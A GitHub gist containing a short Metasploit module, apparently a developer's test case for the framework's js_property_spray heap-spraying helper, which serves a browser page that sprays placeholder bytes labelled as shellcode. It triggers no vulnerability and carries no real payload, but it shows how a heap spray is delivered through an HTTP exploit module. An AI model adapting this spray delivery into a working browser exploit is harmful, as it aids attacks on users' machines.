Skip to content

Instantly share code, notes, and snippets.

@wchen-r7
Created March 3, 2013 19:39
Show Gist options
  • Save wchen-r7/89f6d6c8d26745e99e00 to your computer and use it in GitHub Desktop.
Save wchen-r7/89f6d6c8d26745e99e00 to your computer and use it in GitHub Desktop.
A test case for Metasploit's heap spraying function: js_property_spray
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "Heap Spray Test Case",
'Description' => %q{ Heap Spray Test Case },
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' => [ [ 'URL', 'https://community.rapid7.com/community/metasploit/blog' ] ],
'Platform' => 'win',
'Targets' => [ [ 'Automatic', {} ] ],
'Privileged' => false,
'DisclosureDate' => "Mar 03 2013",
'DefaultTarget' => 0))
end
def load_spray_html(cli, req)
spray = js_property_spray
html = %Q|
<html>
<head></head>
<body>
<script>
#{spray}
var s = unescape("%u4141%u4141%u4242%u4242%u4343%u4343%u4444%u4444%u4545%u4545%u4646%u4646%u4747%u4747");
sprayHeap({shellcode:s});
alert("done");
</script>
</body>
</html>
|
return html
end
def on_request_uri(cli, request)
html = load_spray_html(cli, request)
html = html.gsub(/^\t\t/, '')
print_status("Sending HTML...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment